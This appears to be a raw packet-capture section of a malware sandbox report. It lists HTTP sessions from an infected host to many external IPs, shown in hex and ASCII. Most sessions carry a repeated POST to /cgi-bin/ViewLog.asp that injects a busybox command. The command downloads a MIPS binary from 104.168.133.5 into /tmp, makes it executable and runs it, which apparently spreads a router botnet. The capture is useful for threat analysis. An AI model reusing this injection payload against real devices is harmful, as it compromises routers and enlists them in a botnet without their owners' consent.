                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 34 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:14:57Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.143578085.95.152.1128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.561356068 CET388INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:20:05 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.143430694.121.154.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.648742914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              52192.168.2.144714295.164.243.438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.751048088 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.854687929 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:15:14 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3556
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from ubuntu
                                              X-Cache-Lookup: NONE from ubuntu:8080
                                              Via: 1.1 ubuntu (squid/3.5.27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              53192.168.2.144680031.136.26.2558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.833195925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:15.400620937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:16.520503998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:18.792406082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.400232077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.359880924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.047059059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909589052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              54192.168.2.145280431.136.175.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.835771084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:15.400607109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:16.552508116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:19.048415899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.656234980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.871829987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.047040939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909625053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              55192.168.2.145333894.236.167.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.860692024 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              56192.168.2.1439596120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.871530056 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 34 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:14:57Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              57192.168.2.144690095.229.125.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.871809006 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
